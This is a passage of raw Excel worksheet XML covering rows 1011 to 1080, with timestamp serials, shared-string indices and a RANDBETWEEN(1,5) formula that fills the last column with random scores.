      <c r="F1011">
        <f t="shared" ca="1" si="15"/>
        <v>5</v>
      </c>
    </row>
    <row r="1012" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A1012" s="1">
        <v>43539.445567129631</v>
      </c>
      <c r="B1012" t="s">
        <v>5</v>
      </c>
      <c r="C1012" t="s">
        <v>71</v>
      </c>
      <c r="E1012" s="2" t="s">
        <v>1114</v>
      </c>
      <c r="F1012">
        <f t="shared" ca="1" si="15"/>
        <v>2</v>
      </c>
    </row>
    <row r="1013" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A1013" s="1">
        <v>43539.434189814812</v>
      </c>
      <c r="B1013" t="s">
        <v>9</v>
      </c>
      <c r="C1013" t="s">
        <v>65</v>
      </c>
      <c r="E1013" s="2" t="s">
        <v>1115</v>
      </c>
      <c r="F1013">
        <f t="shared" ca="1" si="15"/>
        <v>1</v>
      </c>
    </row>
    <row r="1014" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1014" s="1">
        <v>43539.42863425926</v>
      </c>
      <c r="B1014" t="s">
        <v>9</v>
      </c>
      <c r="C1014" t="s">
        <v>65</v>
      </c>
      <c r="F1014">
        <f t="shared" ca="1" si="15"/>
        <v>2</v>
      </c>
    </row>
    <row r="1015" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1015" s="1">
        <v>43539.422662037039</v>
      </c>
      <c r="B1015" t="s">
        <v>5</v>
      </c>
      <c r="C1015" t="s">
        <v>10</v>
      </c>
      <c r="D1015" t="s">
        <v>36</v>
      </c>
      <c r="E1015" t="s">
        <v>1116</v>
      </c>
      <c r="F1015">
        <f t="shared" ca="1" si="15"/>
        <v>2</v>
      </c>
    </row>
    <row r="1016" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A1016" s="1">
        <v>43539.388541666667</v>
      </c>
      <c r="B1016" t="s">
        <v>19</v>
      </c>
      <c r="C1016" t="s">
        <v>10</v>
      </c>
      <c r="D1016" t="s">
        <v>80</v>
      </c>
      <c r="E1016" s="2" t="s">
        <v>1117</v>
      </c>
      <c r="F1016">
        <f t="shared" ca="1" si="15"/>
        <v>3</v>
      </c>
    </row>
    <row r="1017" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1017" s="1">
        <v>43539.379432870373</v>
      </c>
      <c r="B1017" t="s">
        <v>19</v>
      </c>
      <c r="C1017" t="s">
        <v>124</v>
      </c>
      <c r="E1017" s="2" t="s">
        <v>1118</v>
      </c>
      <c r="F1017">
        <f t="shared" ca="1" si="15"/>
        <v>2</v>
      </c>
    </row>
    <row r="1018" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1018" s="1">
        <v>43539.356064814812</v>
      </c>
      <c r="B1018" t="s">
        <v>19</v>
      </c>
      <c r="C1018" t="s">
        <v>48</v>
      </c>
      <c r="E1018" s="2" t="s">
        <v>1119</v>
      </c>
      <c r="F1018">
        <f t="shared" ca="1" si="15"/>
        <v>3</v>
      </c>
    </row>
    <row r="1019" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1019" s="1">
        <v>43539.338333333333</v>
      </c>
      <c r="B1019" t="s">
        <v>5</v>
      </c>
      <c r="C1019" t="s">
        <v>41</v>
      </c>
      <c r="E1019" s="2" t="s">
        <v>1120</v>
      </c>
      <c r="F1019">
        <f t="shared" ca="1" si="15"/>
        <v>3</v>
      </c>
    </row>
    <row r="1020" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A1020" s="1">
        <v>43539.333854166667</v>
      </c>
      <c r="B1020" t="s">
        <v>5</v>
      </c>
      <c r="C1020" t="s">
        <v>71</v>
      </c>
      <c r="E1020" s="2" t="s">
        <v>1121</v>
      </c>
      <c r="F1020">
        <f t="shared" ca="1" si="15"/>
        <v>4</v>
      </c>
    </row>
    <row r="1021" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1021" s="1">
        <v>43539.317418981482</v>
      </c>
      <c r="B1021" t="s">
        <v>35</v>
      </c>
      <c r="C1021" t="s">
        <v>461</v>
      </c>
      <c r="E1021" s="2" t="s">
        <v>1122</v>
      </c>
      <c r="F1021">
        <f t="shared" ca="1" si="15"/>
        <v>3</v>
      </c>
    </row>
    <row r="1022" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A1022" s="1">
        <v>43539.31077546296</v>
      </c>
      <c r="B1022" t="s">
        <v>19</v>
      </c>
      <c r="C1022" t="s">
        <v>103</v>
      </c>
      <c r="E1022" s="2" t="s">
        <v>1123</v>
      </c>
      <c r="F1022">
        <f t="shared" ca="1" si="15"/>
        <v>5</v>
      </c>
    </row>
    <row r="1023" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A1023" s="1">
        <v>43539.287673611114</v>
      </c>
      <c r="B1023" t="s">
        <v>19</v>
      </c>
      <c r="C1023" t="s">
        <v>48</v>
      </c>
      <c r="E1023" s="2" t="s">
        <v>1125</v>
      </c>
      <c r="F1023">
        <f t="shared" ca="1" si="15"/>
        <v>2</v>
      </c>
    </row>
    <row r="1024" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A1024" s="1">
        <v>43539.239027777781</v>
      </c>
      <c r="B1024" t="s">
        <v>19</v>
      </c>
      <c r="C1024" t="s">
        <v>103</v>
      </c>
      <c r="E1024" s="2" t="s">
        <v>1126</v>
      </c>
      <c r="F1024">
        <f t="shared" ca="1" si="15"/>
        <v>5</v>
      </c>
    </row>
    <row r="1025" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A1025" s="1">
        <v>43539.224120370367</v>
      </c>
      <c r="B1025" t="s">
        <v>5</v>
      </c>
      <c r="C1025" t="s">
        <v>173</v>
      </c>
      <c r="D1025" t="s">
        <v>632</v>
      </c>
      <c r="E1025" s="2" t="s">
        <v>1127</v>
      </c>
      <c r="F1025">
        <f t="shared" ca="1" si="15"/>
        <v>4</v>
      </c>
    </row>
    <row r="1026" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1026" s="1">
        <v>43539.208414351851</v>
      </c>
      <c r="B1026" t="s">
        <v>5</v>
      </c>
      <c r="C1026" t="s">
        <v>73</v>
      </c>
      <c r="E1026" s="2" t="s">
        <v>1128</v>
      </c>
      <c r="F1026">
        <f t="shared" ref="F1026:F1089" ca="1" si="16">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="1027" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A1027" s="1">
        <v>43539.205150462964</v>
      </c>
      <c r="B1027" t="s">
        <v>5</v>
      </c>
      <c r="C1027" t="s">
        <v>41</v>
      </c>
      <c r="E1027" s="2" t="s">
        <v>1129</v>
      </c>
      <c r="F1027">
        <f t="shared" ca="1" si="16"/>
        <v>5</v>
      </c>
    </row>
    <row r="1028" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1028" s="1">
        <v>43539.203402777777</v>
      </c>
      <c r="B1028" t="s">
        <v>35</v>
      </c>
      <c r="C1028" t="s">
        <v>1130</v>
      </c>
      <c r="E1028" s="2" t="s">
        <v>1131</v>
      </c>
      <c r="F1028">
        <f t="shared" ca="1" si="16"/>
        <v>4</v>
      </c>
    </row>
    <row r="1029" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1029" s="1">
        <v>43539.196747685186</v>
      </c>
      <c r="B1029" t="s">
        <v>13</v>
      </c>
      <c r="C1029" t="s">
        <v>463</v>
      </c>
      <c r="E1029" s="2" t="s">
        <v>1132</v>
      </c>
      <c r="F1029">
        <f t="shared" ca="1" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="1030" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1030" s="1">
        <v>43539.188437500001</v>
      </c>
      <c r="B1030" t="s">
        <v>19</v>
      </c>
      <c r="C1030" t="s">
        <v>173</v>
      </c>
      <c r="E1030" t="s">
        <v>1133</v>
      </c>
      <c r="F1030">
        <f t="shared" ca="1" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="1031" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A1031" s="1">
        <v>43539.170937499999</v>
      </c>
      <c r="B1031" t="s">
        <v>19</v>
      </c>
      <c r="C1031" t="s">
        <v>319</v>
      </c>
      <c r="D1031" t="s">
        <v>320</v>
      </c>
      <c r="E1031" s="2" t="s">
        <v>1134</v>
      </c>
      <c r="F1031">
        <f t="shared" ca="1" si="16"/>
        <v>5</v>
      </c>
    </row>
    <row r="1032" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1032" s="1">
        <v>43539.163726851853</v>
      </c>
      <c r="B1032" t="s">
        <v>5</v>
      </c>
      <c r="C1032" t="s">
        <v>71</v>
      </c>
      <c r="E1032" s="2" t="s">
        <v>1135</v>
      </c>
      <c r="F1032">
        <f t="shared" ca="1" si="16"/>
        <v>5</v>
      </c>
    </row>
    <row r="1033" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1033" s="1">
        <v>43539.140462962961</v>
      </c>
      <c r="B1033" t="s">
        <v>19</v>
      </c>
      <c r="C1033" t="s">
        <v>73</v>
      </c>
      <c r="E1033" t="s">
        <v>1136</v>
      </c>
      <c r="F1033">
        <f t="shared" ca="1" si="16"/>
        <v>3</v>
      </c>
    </row>
    <row r="1034" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1034" s="1">
        <v>43538.951203703706</v>
      </c>
      <c r="B1034" t="s">
        <v>22</v>
      </c>
      <c r="C1034" t="s">
        <v>301</v>
      </c>
      <c r="E1034" t="s">
        <v>1137</v>
      </c>
      <c r="F1034">
        <f t="shared" ca="1" si="16"/>
        <v>4</v>
      </c>
    </row>
    <row r="1035" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1035" s="1">
        <v>43538.875833333332</v>
      </c>
      <c r="B1035" t="s">
        <v>9</v>
      </c>
      <c r="C1035" t="s">
        <v>10</v>
      </c>
      <c r="D1035" t="s">
        <v>41</v>
      </c>
      <c r="E1035" t="s">
        <v>1138</v>
      </c>
      <c r="F1035">
        <f t="shared" ca="1" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="1036" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1036" s="1">
        <v>43538.801608796297</v>
      </c>
      <c r="B1036" t="s">
        <v>9</v>
      </c>
      <c r="C1036" t="s">
        <v>10</v>
      </c>
      <c r="D1036" t="s">
        <v>6</v>
      </c>
      <c r="E1036" t="s">
        <v>1139</v>
      </c>
      <c r="F1036">
        <f t="shared" ca="1" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="1037" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1037" s="1">
        <v>43538.786469907405</v>
      </c>
      <c r="B1037" t="s">
        <v>19</v>
      </c>
      <c r="C1037" t="s">
        <v>144</v>
      </c>
      <c r="E1037" t="s">
        <v>1140</v>
      </c>
      <c r="F1037">
        <f t="shared" ca="1" si="16"/>
        <v>2</v>
      </c>
    </row>
    <row r="1038" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1038" s="1">
        <v>43538.784895833334</v>
      </c>
      <c r="B1038" t="s">
        <v>13</v>
      </c>
      <c r="C1038" t="s">
        <v>10</v>
      </c>
      <c r="D1038" t="s">
        <v>17</v>
      </c>
      <c r="E1038" t="s">
        <v>1141</v>
      </c>
      <c r="F1038">
        <f t="shared" ca="1" si="16"/>
        <v>4</v>
      </c>
    </row>
    <row r="1039" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1039" s="1">
        <v>43538.778425925928</v>
      </c>
      <c r="B1039" t="s">
        <v>5</v>
      </c>
      <c r="C1039" t="s">
        <v>10</v>
      </c>
      <c r="D1039" t="s">
        <v>11</v>
      </c>
      <c r="F1039">
        <f t="shared" ca="1" si="16"/>
        <v>4</v>
      </c>
    </row>
    <row r="1040" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1040" s="1">
        <v>43538.767222222225</v>
      </c>
      <c r="B1040" t="s">
        <v>13</v>
      </c>
      <c r="C1040" t="s">
        <v>10</v>
      </c>
      <c r="D1040" t="s">
        <v>46</v>
      </c>
      <c r="E1040" t="s">
        <v>1142</v>
      </c>
      <c r="F1040">
        <f t="shared" ca="1" si="16"/>
        <v>4</v>
      </c>
    </row>
    <row r="1041" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A1041" s="1">
        <v>43538.750243055554</v>
      </c>
      <c r="B1041" t="s">
        <v>19</v>
      </c>
      <c r="C1041" t="s">
        <v>10</v>
      </c>
      <c r="D1041" t="s">
        <v>6</v>
      </c>
      <c r="E1041" s="2" t="s">
        <v>1143</v>
      </c>
      <c r="F1041">
        <f t="shared" ca="1" si="16"/>
        <v>3</v>
      </c>
    </row>
    <row r="1042" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A1042" s="1">
        <v>43538.72997685185</v>
      </c>
      <c r="B1042" t="s">
        <v>35</v>
      </c>
      <c r="C1042" t="s">
        <v>10</v>
      </c>
      <c r="D1042" t="s">
        <v>71</v>
      </c>
      <c r="E1042" s="2" t="s">
        <v>1144</v>
      </c>
      <c r="F1042">
        <f t="shared" ca="1" si="16"/>
        <v>3</v>
      </c>
    </row>
    <row r="1043" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1043" s="1">
        <v>43538.725451388891</v>
      </c>
      <c r="B1043" t="s">
        <v>5</v>
      </c>
      <c r="C1043" t="s">
        <v>6</v>
      </c>
      <c r="D1043" t="s">
        <v>25</v>
      </c>
      <c r="E1043" t="s">
        <v>1145</v>
      </c>
      <c r="F1043">
        <f t="shared" ca="1" si="16"/>
        <v>4</v>
      </c>
    </row>
    <row r="1044" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1044" s="1">
        <v>43538.708067129628</v>
      </c>
      <c r="B1044" t="s">
        <v>13</v>
      </c>
      <c r="C1044" t="s">
        <v>10</v>
      </c>
      <c r="D1044" t="s">
        <v>229</v>
      </c>
      <c r="E1044" t="s">
        <v>1146</v>
      </c>
      <c r="F1044">
        <f t="shared" ca="1" si="16"/>
        <v>4</v>
      </c>
    </row>
    <row r="1045" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1045" s="1">
        <v>43538.687881944446</v>
      </c>
      <c r="B1045" t="s">
        <v>13</v>
      </c>
      <c r="C1045" t="s">
        <v>10</v>
      </c>
      <c r="D1045" t="s">
        <v>89</v>
      </c>
      <c r="E1045" t="s">
        <v>1147</v>
      </c>
      <c r="F1045">
        <f t="shared" ca="1" si="16"/>
        <v>2</v>
      </c>
    </row>
    <row r="1046" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1046" s="1">
        <v>43538.678472222222</v>
      </c>
      <c r="B1046" t="s">
        <v>13</v>
      </c>
      <c r="C1046" t="s">
        <v>10</v>
      </c>
      <c r="D1046" t="s">
        <v>6</v>
      </c>
      <c r="E1046" t="s">
        <v>1148</v>
      </c>
      <c r="F1046">
        <f t="shared" ca="1" si="16"/>
        <v>3</v>
      </c>
    </row>
    <row r="1047" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1047" s="1">
        <v>43538.666377314818</v>
      </c>
      <c r="B1047" t="s">
        <v>13</v>
      </c>
      <c r="C1047" t="s">
        <v>10</v>
      </c>
      <c r="D1047" t="s">
        <v>6</v>
      </c>
      <c r="E1047" t="s">
        <v>1149</v>
      </c>
      <c r="F1047">
        <f t="shared" ca="1" si="16"/>
        <v>3</v>
      </c>
    </row>
    <row r="1048" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1048" s="1">
        <v>43538.662789351853</v>
      </c>
      <c r="B1048" t="s">
        <v>35</v>
      </c>
      <c r="C1048" t="s">
        <v>260</v>
      </c>
      <c r="E1048" s="2" t="s">
        <v>1150</v>
      </c>
      <c r="F1048">
        <f t="shared" ca="1" si="16"/>
        <v>3</v>
      </c>
    </row>
    <row r="1049" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1049" s="1">
        <v>43538.662534722222</v>
      </c>
      <c r="B1049" t="s">
        <v>19</v>
      </c>
      <c r="C1049" t="s">
        <v>10</v>
      </c>
      <c r="D1049" t="s">
        <v>271</v>
      </c>
      <c r="E1049" t="s">
        <v>1151</v>
      </c>
      <c r="F1049">
        <f t="shared" ca="1" si="16"/>
        <v>4</v>
      </c>
    </row>
    <row r="1050" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A1050" s="1">
        <v>43538.660277777781</v>
      </c>
      <c r="B1050" t="s">
        <v>13</v>
      </c>
      <c r="C1050" t="s">
        <v>10</v>
      </c>
      <c r="D1050" t="s">
        <v>23</v>
      </c>
      <c r="E1050" s="2" t="s">
        <v>1152</v>
      </c>
      <c r="F1050">
        <f t="shared" ca="1" si="16"/>
        <v>4</v>
      </c>
    </row>
    <row r="1051" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A1051" s="1">
        <v>43538.654664351852</v>
      </c>
      <c r="B1051" t="s">
        <v>13</v>
      </c>
      <c r="C1051" t="s">
        <v>10</v>
      </c>
      <c r="D1051" t="s">
        <v>6</v>
      </c>
      <c r="E1051" s="2" t="s">
        <v>1153</v>
      </c>
      <c r="F1051">
        <f t="shared" ca="1" si="16"/>
        <v>5</v>
      </c>
    </row>
    <row r="1052" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1052" s="1">
        <v>43538.650104166663</v>
      </c>
      <c r="B1052" t="s">
        <v>9</v>
      </c>
      <c r="C1052" t="s">
        <v>48</v>
      </c>
      <c r="E1052" t="s">
        <v>1154</v>
      </c>
      <c r="F1052">
        <f t="shared" ca="1" si="16"/>
        <v>3</v>
      </c>
    </row>
    <row r="1053" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1053" s="1">
        <v>43538.650011574071</v>
      </c>
      <c r="B1053" t="s">
        <v>5</v>
      </c>
      <c r="C1053" t="s">
        <v>10</v>
      </c>
      <c r="D1053" t="s">
        <v>36</v>
      </c>
      <c r="E1053" t="s">
        <v>1155</v>
      </c>
      <c r="F1053">
        <f t="shared" ca="1" si="16"/>
        <v>5</v>
      </c>
    </row>
    <row r="1054" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1054" s="1">
        <v>43538.61210648148</v>
      </c>
      <c r="B1054" t="s">
        <v>13</v>
      </c>
      <c r="C1054" t="s">
        <v>10</v>
      </c>
      <c r="D1054" t="s">
        <v>36</v>
      </c>
      <c r="E1054" t="s">
        <v>1156</v>
      </c>
      <c r="F1054">
        <f t="shared" ca="1" si="16"/>
        <v>2</v>
      </c>
    </row>
    <row r="1055" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1055" s="1">
        <v>43538.609039351853</v>
      </c>
      <c r="B1055" t="s">
        <v>13</v>
      </c>
      <c r="C1055" t="s">
        <v>10</v>
      </c>
      <c r="D1055" t="s">
        <v>192</v>
      </c>
      <c r="E1055" t="s">
        <v>1157</v>
      </c>
      <c r="F1055">
        <f t="shared" ca="1" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="1056" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1056" s="1">
        <v>43538.581122685187</v>
      </c>
      <c r="B1056" t="s">
        <v>35</v>
      </c>
      <c r="C1056" t="s">
        <v>10</v>
      </c>
      <c r="D1056" t="s">
        <v>271</v>
      </c>
      <c r="E1056" s="2" t="s">
        <v>1158</v>
      </c>
      <c r="F1056">
        <f t="shared" ca="1" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="1057" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1057" s="1">
        <v>43538.56449074074</v>
      </c>
      <c r="B1057" t="s">
        <v>5</v>
      </c>
      <c r="C1057" t="s">
        <v>10</v>
      </c>
      <c r="D1057" t="s">
        <v>112</v>
      </c>
      <c r="E1057" t="s">
        <v>1159</v>
      </c>
      <c r="F1057">
        <f t="shared" ca="1" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="1058" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1058" s="1">
        <v>43538.559861111113</v>
      </c>
      <c r="B1058" t="s">
        <v>9</v>
      </c>
      <c r="C1058" t="s">
        <v>10</v>
      </c>
      <c r="D1058" t="s">
        <v>1160</v>
      </c>
      <c r="E1058" t="s">
        <v>1161</v>
      </c>
      <c r="F1058">
        <f t="shared" ca="1" si="16"/>
        <v>5</v>
      </c>
    </row>
    <row r="1059" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1059" s="1">
        <v>43538.55940972222</v>
      </c>
      <c r="B1059" t="s">
        <v>13</v>
      </c>
      <c r="C1059" t="s">
        <v>10</v>
      </c>
      <c r="D1059" t="s">
        <v>6</v>
      </c>
      <c r="E1059" s="2" t="s">
        <v>1162</v>
      </c>
      <c r="F1059">
        <f t="shared" ca="1" si="16"/>
        <v>2</v>
      </c>
    </row>
    <row r="1060" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1060" s="1">
        <v>43538.54420138889</v>
      </c>
      <c r="B1060" t="s">
        <v>13</v>
      </c>
      <c r="C1060" t="s">
        <v>10</v>
      </c>
      <c r="D1060" t="s">
        <v>232</v>
      </c>
      <c r="E1060" t="s">
        <v>1163</v>
      </c>
      <c r="F1060">
        <f t="shared" ca="1" si="16"/>
        <v>3</v>
      </c>
    </row>
    <row r="1061" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A1061" s="1">
        <v>43538.541898148149</v>
      </c>
      <c r="B1061" t="s">
        <v>13</v>
      </c>
      <c r="C1061" t="s">
        <v>73</v>
      </c>
      <c r="E1061" s="2" t="s">
        <v>1164</v>
      </c>
      <c r="F1061">
        <f t="shared" ca="1" si="16"/>
        <v>5</v>
      </c>
    </row>
    <row r="1062" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1062" s="1">
        <v>43538.51730324074</v>
      </c>
      <c r="B1062" t="s">
        <v>19</v>
      </c>
      <c r="C1062" t="s">
        <v>10</v>
      </c>
      <c r="D1062" t="s">
        <v>494</v>
      </c>
      <c r="E1062" t="s">
        <v>1165</v>
      </c>
      <c r="F1062">
        <f t="shared" ca="1" si="16"/>
        <v>3</v>
      </c>
    </row>
    <row r="1063" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1063" s="1">
        <v>43538.499282407407</v>
      </c>
      <c r="B1063" t="s">
        <v>5</v>
      </c>
      <c r="C1063" t="s">
        <v>10</v>
      </c>
      <c r="D1063" t="s">
        <v>163</v>
      </c>
      <c r="E1063" t="s">
        <v>1166</v>
      </c>
      <c r="F1063">
        <f t="shared" ca="1" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="1064" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A1064" s="1">
        <v>43538.487245370372</v>
      </c>
      <c r="B1064" t="s">
        <v>19</v>
      </c>
      <c r="C1064" t="s">
        <v>10</v>
      </c>
      <c r="E1064" s="2" t="s">
        <v>1167</v>
      </c>
      <c r="F1064">
        <f t="shared" ca="1" si="16"/>
        <v>3</v>
      </c>
    </row>
    <row r="1065" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1065" s="1">
        <v>43538.486724537041</v>
      </c>
      <c r="B1065" t="s">
        <v>22</v>
      </c>
      <c r="C1065" t="s">
        <v>41</v>
      </c>
      <c r="E1065" t="s">
        <v>1169</v>
      </c>
      <c r="F1065">
        <f t="shared" ca="1" si="16"/>
        <v>2</v>
      </c>
    </row>
    <row r="1066" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A1066" s="1">
        <v>43538.484907407408</v>
      </c>
      <c r="B1066" t="s">
        <v>5</v>
      </c>
      <c r="C1066" t="s">
        <v>1080</v>
      </c>
      <c r="E1066" s="2" t="s">
        <v>1170</v>
      </c>
      <c r="F1066">
        <f t="shared" ca="1" si="16"/>
        <v>3</v>
      </c>
    </row>
    <row r="1067" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1067" s="1">
        <v>43538.481412037036</v>
      </c>
      <c r="B1067" t="s">
        <v>5</v>
      </c>
      <c r="C1067" t="s">
        <v>10</v>
      </c>
      <c r="D1067" t="s">
        <v>222</v>
      </c>
      <c r="E1067" t="s">
        <v>1171</v>
      </c>
      <c r="F1067">
        <f t="shared" ca="1" si="16"/>
        <v>4</v>
      </c>
    </row>
    <row r="1068" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1068" s="1">
        <v>43538.481296296297</v>
      </c>
      <c r="B1068" t="s">
        <v>13</v>
      </c>
      <c r="C1068" t="s">
        <v>10</v>
      </c>
      <c r="D1068" t="s">
        <v>14</v>
      </c>
      <c r="E1068" t="s">
        <v>1172</v>
      </c>
      <c r="F1068">
        <f t="shared" ca="1" si="16"/>
        <v>5</v>
      </c>
    </row>
    <row r="1069" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1069" s="1">
        <v>43538.477141203701</v>
      </c>
      <c r="B1069" t="s">
        <v>5</v>
      </c>
      <c r="C1069" t="s">
        <v>10</v>
      </c>
      <c r="D1069" t="s">
        <v>271</v>
      </c>
      <c r="E1069" s="2" t="s">
        <v>1173</v>
      </c>
      <c r="F1069">
        <f t="shared" ca="1" si="16"/>
        <v>5</v>
      </c>
    </row>
    <row r="1070" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1070" s="1">
        <v>43538.473240740743</v>
      </c>
      <c r="B1070" t="s">
        <v>19</v>
      </c>
      <c r="C1070" t="s">
        <v>10</v>
      </c>
      <c r="D1070" t="s">
        <v>11</v>
      </c>
      <c r="E1070" t="s">
        <v>1174</v>
      </c>
      <c r="F1070">
        <f t="shared" ca="1" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="1071" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1071" s="1">
        <v>43538.460381944446</v>
      </c>
      <c r="B1071" t="s">
        <v>19</v>
      </c>
      <c r="C1071" t="s">
        <v>454</v>
      </c>
      <c r="E1071" s="2" t="s">
        <v>1175</v>
      </c>
      <c r="F1071">
        <f t="shared" ca="1" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="1072" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1072" s="1">
        <v>43538.459432870368</v>
      </c>
      <c r="B1072" t="s">
        <v>13</v>
      </c>
      <c r="C1072" t="s">
        <v>10</v>
      </c>
      <c r="D1072" t="s">
        <v>14</v>
      </c>
      <c r="E1072" s="2" t="s">
        <v>1176</v>
      </c>
      <c r="F1072">
        <f t="shared" ca="1" si="16"/>
        <v>3</v>
      </c>
    </row>
    <row r="1073" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A1073" s="1">
        <v>43538.434537037036</v>
      </c>
      <c r="B1073" t="s">
        <v>5</v>
      </c>
      <c r="C1073" t="s">
        <v>6</v>
      </c>
      <c r="D1073" t="s">
        <v>25</v>
      </c>
      <c r="E1073" s="2" t="s">
        <v>1177</v>
      </c>
      <c r="F1073">
        <f t="shared" ca="1" si="16"/>
        <v>4</v>
      </c>
    </row>
    <row r="1074" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A1074" s="1">
        <v>43538.422476851854</v>
      </c>
      <c r="B1074" t="s">
        <v>5</v>
      </c>
      <c r="C1074" t="s">
        <v>71</v>
      </c>
      <c r="E1074" s="2" t="s">
        <v>1178</v>
      </c>
      <c r="F1074">
        <f t="shared" ca="1" si="16"/>
        <v>2</v>
      </c>
    </row>
    <row r="1075" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A1075" s="1">
        <v>43538.416388888887</v>
      </c>
      <c r="B1075" t="s">
        <v>19</v>
      </c>
      <c r="C1075" t="s">
        <v>1179</v>
      </c>
      <c r="E1075" s="2" t="s">
        <v>1180</v>
      </c>
      <c r="F1075">
        <f t="shared" ca="1" si="16"/>
        <v>5</v>
      </c>
    </row>
    <row r="1076" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1076" s="1">
        <v>43538.414085648146</v>
      </c>
      <c r="B1076" t="s">
        <v>5</v>
      </c>
      <c r="C1076" t="s">
        <v>10</v>
      </c>
      <c r="D1076" t="s">
        <v>6</v>
      </c>
      <c r="E1076" t="s">
        <v>1181</v>
      </c>
      <c r="F1076">
        <f t="shared" ca="1" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="1077" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1077" s="1">
        <v>43538.410740740743</v>
      </c>
      <c r="B1077" t="s">
        <v>13</v>
      </c>
      <c r="C1077" t="s">
        <v>10</v>
      </c>
      <c r="D1077" t="s">
        <v>151</v>
      </c>
      <c r="E1077" t="s">
        <v>1182</v>
      </c>
      <c r="F1077">
        <f t="shared" ca="1" si="16"/>
        <v>3</v>
      </c>
    </row>
    <row r="1078" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1078" s="1">
        <v>43538.410034722219</v>
      </c>
      <c r="B1078" t="s">
        <v>22</v>
      </c>
      <c r="C1078" t="s">
        <v>10</v>
      </c>
      <c r="D1078" t="s">
        <v>23</v>
      </c>
      <c r="E1078" t="s">
        <v>31</v>
      </c>
      <c r="F1078">
        <f t="shared" ca="1" si="16"/>
        <v>4</v>
      </c>
    </row>
    <row r="1079" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A1079" s="1">
        <v>43538.407592592594</v>
      </c>
      <c r="B1079" t="s">
        <v>19</v>
      </c>
      <c r="C1079" t="s">
        <v>559</v>
      </c>
      <c r="E1079" s="2" t="s">
        <v>1183</v>
      </c>
      <c r="F1079">
        <f t="shared" ca="1" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="1080" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1080" s="1">
        <v>43538.403657407405</v>
      </c>
